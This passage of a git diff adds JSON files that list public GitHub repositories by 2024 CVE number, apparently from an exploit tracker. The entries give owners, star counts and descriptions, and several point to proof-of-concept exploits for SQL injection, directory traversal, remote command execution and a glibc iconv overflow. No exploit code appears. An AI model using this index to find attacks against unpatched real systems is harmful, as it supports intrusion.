+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4",
+ "html_url": "https:\/\/github.com\/RenukaSelvar"
+ },
+ "html_url": "https:\/\/github.com\/RenukaSelvar\/expat_CVE-2024-28757",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-03T09:21:27Z",
+ "updated_at": "2024-05-03T09:27:12Z",
+ "pushed_at": "2024-05-03T09:27:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795436472,
+ "name": "expat_2_1_0_CVE-2024-28757",
+ "full_name": "saurabh2088\/expat_2_1_0_CVE-2024-28757",
+ "owner": {
+ "login": "saurabh2088",
+ "id": 52776238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52776238?v=4",
+ "html_url": "https:\/\/github.com\/saurabh2088"
+ },
+ "html_url": "https:\/\/github.com\/saurabh2088\/expat_2_1_0_CVE-2024-28757",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-03T09:24:51Z",
+ "updated_at": "2024-05-03T11:01:45Z",
+ "pushed_at": "2024-05-03T10:55:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795453931,
+ "name": "expat_2_1_1_CVE-2024-28757",
+ "full_name": "saurabh2088\/expat_2_1_1_CVE-2024-28757",
+ "owner": {
+ "login": "saurabh2088",
+ "id": 52776238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52776238?v=4",
+ "html_url": "https:\/\/github.com\/saurabh2088"
+ },
+ "html_url": "https:\/\/github.com\/saurabh2088\/expat_2_1_1_CVE-2024-28757",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-03T10:11:38Z",
+ "updated_at": "2024-05-03T10:11:38Z",
+ "pushed_at": "2024-05-03T10:11:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2876.json b/2024/CVE-2024-2876.json
new file mode 100644
index 0000000000..0553f3ebf4
--- /dev/null
+++ b/2024/CVE-2024-2876.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 791752007,
+ "name": "CVE-2024-2876",
+ "full_name": "c0d3zilla\/CVE-2024-2876",
+ "owner": {
+ "login": "c0d3zilla",
+ "id": 168064397,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168064397?v=4",
+ "html_url": "https:\/\/github.com\/c0d3zilla"
+ },
+ "html_url": "https:\/\/github.com\/c0d3zilla\/CVE-2024-2876",
+ "description": "POC for SQLi vulnerability in Icegram express ",
+ "fork": false,
+ "created_at": "2024-04-25T09:53:22Z",
+ "updated_at": "2024-05-20T09:23:53Z",
+ "pushed_at": "2024-04-25T09:55:55Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2879.json b/2024/CVE-2024-2879.json
new file mode 100644
index 0000000000..954fa80921
--- /dev/null
+++ b/2024/CVE-2024-2879.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783878190,
+ "name": "CVE-2024-2879",
+ "full_name": "herculeszxc\/CVE-2024-2879",
+ "owner": {
+ "login": "herculeszxc",
+ "id": 62851950,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62851950?v=4",
+ "html_url": "https:\/\/github.com\/herculeszxc"
+ },
+ "html_url": "https:\/\/github.com\/herculeszxc\/CVE-2024-2879",
+ "description": "CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-04-08T18:50:02Z",
+ "updated_at": "2024-06-24T06:33:06Z",
+ "pushed_at": "2024-04-08T19:16:28Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28995.json b/2024/CVE-2024-28995.json
new file mode 100644
index 0000000000..25327782e6
--- /dev/null
+++ b/2024/CVE-2024-28995.json
@@ -0,0 +1,182 @@
+[
+ {
+ "id": 814639735,
+ "name": "cves",
+ "full_name": "karkis3c\/cves",
+ "owner": {
+ "login": "karkis3c",
+ "id": 155802810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155802810?v=4",
+ "html_url": "https:\/\/github.com\/karkis3c"
+ },
+ "html_url": "https:\/\/github.com\/karkis3c\/cves",
+ "description": "SolarWinds Serv-U Directory Traversal Vulnerability (CVE-2024-28995) POC",
+ "fork": false,
+ "created_at": "2024-06-13T12:02:33Z",
+ "updated_at": "2024-06-14T09:51:26Z",
+ "pushed_at": "2024-06-14T09:51:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814960106,
+ "name": "CVE-2024-28995",
+ "full_name": "krypton-kry\/CVE-2024-28995",
+ "owner": {
+ "login": "krypton-kry",
+ "id": 66370436,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66370436?v=4",
+ "html_url": "https:\/\/github.com\/krypton-kry"
+ },
+ "html_url": "https:\/\/github.com\/krypton-kry\/CVE-2024-28995",
+ "description": "CVE-2024-28995 PoC",
+ "fork": false,
+ "created_at": "2024-06-14T04:06:58Z",
+ "updated_at": "2024-06-24T16:15:53Z",
+ "pushed_at": "2024-06-14T04:07:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815032884,
+ "name": "CVE-2024-28995",
+ "full_name": "ggfzx\/CVE-2024-28995",
+ "owner": {
+ "login": "ggfzx",
+ "id": 86279656,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4",
+ "html_url": "https:\/\/github.com\/ggfzx"
+ },
+ "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-28995",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:56:03Z",
+ "updated_at": "2024-06-21T07:13:08Z",
+ "pushed_at": "2024-06-14T07:58:28Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815034714,
+ "name": "CVE-2024-28995-Nuclei-Template",
+ "full_name": "huseyinstif\/CVE-2024-28995-Nuclei-Template",
+ "owner": {
+ "login": "huseyinstif",
+ "id": 54823077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4",
+ "html_url": "https:\/\/github.com\/huseyinstif"
+ },
+ "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-28995-Nuclei-Template",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T08:01:13Z",
+ "updated_at": "2024-06-14T08:01:19Z",
+ "pushed_at": "2024-06-14T08:01:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815035984,
+ "name": "CVE-2024-28995",
+ "full_name": "0xkucing\/CVE-2024-28995",
+ "owner": {
+ "login": "0xkucing",
+ "id": 105418279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4",
+ "html_url": "https:\/\/github.com\/0xkucing"
+ },
+ "html_url": "https:\/\/github.com\/0xkucing\/CVE-2024-28995",
+ "description": "Exploit for CVE-2024-28995",
+ "fork": false,
+ "created_at": "2024-06-14T08:04:48Z",
+ "updated_at": "2024-06-14T19:36:34Z",
+ "pushed_at": "2024-06-14T08:08:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815346726,
+ "name": "CVE-2024-28995",
+ "full_name": "bigb0x\/CVE-2024-28995",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-28995",
+ "description": "CVE-2024-28995 POC Vulnerability Scanner",
+ "fork": false,
+ "created_at": "2024-06-14T23:05:40Z",
+ "updated_at": "2024-06-24T04:37:07Z",
+ "pushed_at": "2024-06-15T12:21:28Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-28999.json b/2024/CVE-2024-28999.json
new file mode 100644
index 0000000000..90f433b3a6
--- /dev/null
+++ b/2024/CVE-2024-28999.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 818662371,
+ "name": "CVE-2024-28999",
+ "full_name": "HussainFathy\/CVE-2024-28999",
+ "owner": {
+ "login": "HussainFathy",
+ "id": 76268960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76268960?v=4",
+ "html_url": "https:\/\/github.com\/HussainFathy"
+ },
+ "html_url": "https:\/\/github.com\/HussainFathy\/CVE-2024-28999",
+ "description": "Exploit for CVE-2024-28999 SolarWinds Platform Race Condition Vulnerability - login page",
+ "fork": false,
+ "created_at": "2024-06-22T13:39:56Z",
+ "updated_at": "2024-06-23T17:13:26Z",
+ "pushed_at": "2024-06-22T17:28:56Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29059.json b/2024/CVE-2024-29059.json
new file mode 100644
index 0000000000..fc436ca8b4
--- /dev/null
+++ b/2024/CVE-2024-29059.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770302104,
+ "name": "HttpRemotingObjRefLeak",
+ "full_name": "codewhitesec\/HttpRemotingObjRefLeak",
+ "owner": {
+ "login": "codewhitesec",
+ "id": 8680262,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8680262?v=4",
+ "html_url": "https:\/\/github.com\/codewhitesec"
+ },
+ "html_url": "https:\/\/github.com\/codewhitesec\/HttpRemotingObjRefLeak",
+ "description": "Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)",
+ "fork": false,
+ "created_at": "2024-03-11T10:14:39Z",
+ "updated_at": "2024-06-24T20:08:58Z",
+ "pushed_at": "2024-03-25T12:56:16Z",
+ "stargazers_count": 75,
+ "watchers_count": 75,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 75,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29269.json b/2024/CVE-2024-29269.json
new file mode 100644
index 0000000000..e623196647
--- /dev/null
+++ b/2024/CVE-2024-29269.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 781235641,
+ "name": "CVE-2024-29269",
+ "full_name": "wutalent\/CVE-2024-29269",
+ "owner": {
+ "login": "wutalent",
+ "id": 83970507,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83970507?v=4",
+ "html_url": "https:\/\/github.com\/wutalent"
+ },
+ "html_url": "https:\/\/github.com\/wutalent\/CVE-2024-29269",
+ "description": "CVE-2024-29269",
+ "fork": false,
+ "created_at": "2024-04-03T02:02:27Z",
+ "updated_at": "2024-06-07T15:48:55Z",
+ "pushed_at": "2024-04-03T02:19:52Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 785588692,
+ "name": "CVE-2024-29269",
+ "full_name": "YongYe-Security\/CVE-2024-29269",
+ "owner": {
+ "login": "YongYe-Security",
+ "id": 90460865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4",
+ "html_url": "https:\/\/github.com\/YongYe-Security"
+ },
+ "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-29269",
+ "description": "Telesquare TLR-2005KSH_RCE (CVE-2024-29269) Batch scan\/exploit",
+ "fork": false,
+ "created_at": "2024-04-12T07:36:08Z",
+ "updated_at": "2024-06-08T14:54:09Z",
+ "pushed_at": "2024-04-12T07:58:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802976156,
+ "name": "CVE-2024-29269",
+ "full_name": "Chocapikk\/CVE-2024-29269",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-29269",
+ "description": "An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.",
+ "fork": false,
+ "created_at": "2024-05-19T19:05:00Z",
+ "updated_at": "2024-06-23T17:42:10Z",
+ "pushed_at": "2024-05-19T19:12:32Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812434204,
+ "name": "CVE-2024-29269",
+ "full_name": "Jhonsonwannaa\/CVE-2024-29269",
+ "owner": {
+ "login": "Jhonsonwannaa",
+ "id": 114837630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4",
+ "html_url": "https:\/\/github.com\/Jhonsonwannaa"
+ },
+ "html_url": "https:\/\/github.com\/Jhonsonwannaa\/CVE-2024-29269",
+ "description": "An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.",
+ "fork": false,
+ "created_at": "2024-06-08T22:06:33Z",
+ "updated_at": "2024-06-21T21:01:33Z",
+ "pushed_at": "2024-06-21T21:01:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29272.json b/2024/CVE-2024-29272.json
new file mode 100644
index 0000000000..b03e2f4016
--- /dev/null
+++ b/2024/CVE-2024-29272.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 777466221,
+ "name": "CVE-2024-29272",
+ "full_name": "awjkjflkwlekfdjs\/CVE-2024-29272",
+ "owner": {
+ "login": "awjkjflkwlekfdjs",
+ "id": 164954340,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164954340?v=4",
+ "html_url": "https:\/\/github.com\/awjkjflkwlekfdjs"
+ },
+ "html_url": "https:\/\/github.com\/awjkjflkwlekfdjs\/CVE-2024-29272",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-25T22:43:42Z",
+ "updated_at": "2024-03-25T22:44:59Z",
+ "pushed_at": "2024-03-26T06:59:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29275.json b/2024/CVE-2024-29275.json
new file mode 100644
index 0000000000..48dd1176e8
--- /dev/null
+++ b/2024/CVE-2024-29275.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817879551,
+ "name": "nuclei_template",
+ "full_name": "Cyphercoda\/nuclei_template",
+ "owner": {
+ "login": "Cyphercoda",
+ "id": 27870649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27870649?v=4",
+ "html_url": "https:\/\/github.com\/Cyphercoda"
+ },
+ "html_url": "https:\/\/github.com\/Cyphercoda\/nuclei_template",
+ "description": "CVE-2024-29275.yaml",
+ "fork": false,
+ "created_at": "2024-06-20T16:19:30Z",
+ "updated_at": "2024-06-21T01:50:31Z",
+ "pushed_at": "2024-06-20T17:25:50Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29278.json b/2024/CVE-2024-29278.json
new file mode 100644
index 0000000000..9d7783c08c
--- /dev/null
+++ b/2024/CVE-2024-29278.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 779182155,
+ "name": "cve",
+ "full_name": "QDming\/cve",
+ "owner": {
+ "login": "QDming",
+ "id": 109197048,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109197048?v=4",
+ "html_url": "https:\/\/github.com\/QDming"
+ },
+ "html_url": "https:\/\/github.com\/QDming\/cve",
+ "description": "Use CVE-2024-29278",
+ "fork": false,
+ "created_at": "2024-03-29T08:20:23Z",
+ "updated_at": "2024-03-29T08:20:23Z",
+ "pushed_at": "2024-03-29T08:51:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29296.json b/2024/CVE-2024-29296.json
new file mode 100644
index 0000000000..906ae13ab5
--- /dev/null
+++ b/2024/CVE-2024-29296.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 784425919,
+ "name": "CVE-2024-29296",
+ "full_name": "ThaySolis\/CVE-2024-29296",
+ "owner": {
+ "login": "ThaySolis",
+ "id": 75222240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75222240?v=4",
+ "html_url": "https:\/\/github.com\/ThaySolis"
+ },
+ "html_url": "https:\/\/github.com\/ThaySolis\/CVE-2024-29296",
+ "description": "CVE-2024-29296 - User enumeration on Portainer CE - 2.19.4",
+ "fork": false,
+ "created_at": "2024-04-09T20:36:03Z",
+ "updated_at": "2024-05-07T11:48:13Z",
+ "pushed_at": "2024-04-11T13:53:50Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 793734104,
+ "name": "CVE-2024-29296-PoC",
+ "full_name": "Lavender-exe\/CVE-2024-29296-PoC",
+ "owner": {
+ "login": "Lavender-exe",
+ "id": 32195948,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32195948?v=4",
+ "html_url": "https:\/\/github.com\/Lavender-exe"
+ },
+ "html_url": "https:\/\/github.com\/Lavender-exe\/CVE-2024-29296-PoC",
+ "description": "User Enumeration through response time difference",
+ "fork": false,
+ "created_at": "2024-04-29T19:09:41Z",
+ "updated_at": "2024-04-29T23:58:37Z",
+ "pushed_at": "2024-04-29T19:12:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "enumeration",
+ "portainer"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29375.json b/2024/CVE-2024-29375.json
new file mode 100644
index 0000000000..e6e9efcc74
--- /dev/null
+++ b/2024/CVE-2024-29375.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770488543,
+ "name": "CVE-2024-29375",
+ "full_name": "ismailcemunver\/CVE-2024-29375",
+ "owner": {
+ "login": "ismailcemunver",
+ "id": 154702425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154702425?v=4",
+ "html_url": "https:\/\/github.com\/ismailcemunver"
+ },
+ "html_url": "https:\/\/github.com\/ismailcemunver\/CVE-2024-29375",
+ "description": "CSV Injection in Addactis IBNRS 3.10.3.107",
+ "fork": false,
+ "created_at": "2024-03-11T16:32:41Z",
+ "updated_at": "2024-03-30T12:45:25Z",
+ "pushed_at": "2024-04-03T06:56:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29399.json b/2024/CVE-2024-29399.json
new file mode 100644
index 0000000000..0255e97b3e
--- /dev/null
+++ b/2024/CVE-2024-29399.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783958528,
+ "name": "CVE-2024-29399",
+ "full_name": "ally-petitt\/CVE-2024-29399",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-29399",
+ "description": "CVE-2024-29399 reference",
+ "fork": false,
+ "created_at": "2024-04-08T23:03:04Z",
+ "updated_at": "2024-04-10T04:07:47Z",
+ "pushed_at": "2024-04-08T23:18:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2961.json b/2024/CVE-2024-2961.json
new file mode 100644
index 0000000000..b93c2cab09
--- /dev/null
+++ b/2024/CVE-2024-2961.json
@@ -0,0 +1,222 @@
+[
+ {
+ "id": 791152279,
+ "name": "FIX-CVE-2024-2961",
+ "full_name": "mattaperkins\/FIX-CVE-2024-2961",
+ "owner": {
+ "login": "mattaperkins",
+ "id": 37165019,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37165019?v=4",
+ "html_url": "https:\/\/github.com\/mattaperkins"
+ },
+ "html_url": "https:\/\/github.com\/mattaperkins\/FIX-CVE-2024-2961",
+ "description": "Quick mitigation script ",
+ "fork": false,
+ "created_at": "2024-04-24T07:32:08Z",
+ "updated_at": "2024-06-06T00:03:18Z",
+ "pushed_at": "2024-04-24T07:43:10Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803147840,
+ "name": "CVE-2024-2961",
+ "full_name": "rvizx\/CVE-2024-2961",
+ "owner": {
+ "login": "rvizx",
+ "id": 84989569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4",
+ "html_url": "https:\/\/github.com\/rvizx"
+ },
+ "html_url": "https:\/\/github.com\/rvizx\/CVE-2024-2961",
+ "description": "CVE-2024–2961 Security Issue Mitigation Script",
+ "fork": false,
+ "created_at": "2024-05-20T06:53:23Z",
+ "updated_at": "2024-06-17T07:40:12Z",
+ "pushed_at": "2024-05-20T07:12:24Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806456046,
+ "name": "cnext-exploits",
+ "full_name": "ambionics\/cnext-exploits",
+ "owner": {
+ "login": "ambionics",
+ "id": 29630660,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4",
+ "html_url": "https:\/\/github.com\/ambionics"
+ },
+ "html_url": "https:\/\/github.com\/ambionics\/cnext-exploits",
+ "description": "Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()",
+ "fork": false,
+ "created_at": "2024-05-27T08:30:06Z",
+ "updated_at": "2024-06-25T14:43:28Z",
+ "pushed_at": "2024-06-17T08:10:13Z",
+ "stargazers_count": 291,
+ "watchers_count": 291,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 291,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 808153966,
+ "name": "iconvfix",
+ "full_name": "absolutedesignltd\/iconvfix",
+ "owner": {
+ "login": "absolutedesignltd",
+ "id": 11164000,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11164000?v=4",
+ "html_url": "https:\/\/github.com\/absolutedesignltd"
+ },
+ "html_url": "https:\/\/github.com\/absolutedesignltd\/iconvfix",
+ "description": "Bash script to patch for CVE-2024-2961",
+ "fork": false,
+ "created_at": "2024-05-30T13:45:43Z",
+ "updated_at": "2024-05-30T13:57:37Z",
+ "pushed_at": "2024-05-30T13:57:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 810040956,
+ "name": "test_iconv",
+ "full_name": "exfil0\/test_iconv",
+ "owner": {
+ "login": "exfil0",
+ "id": 84948741,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84948741?v=4",
+ "html_url": "https:\/\/github.com\/exfil0"
+ },
+ "html_url": "https:\/\/github.com\/exfil0\/test_iconv",
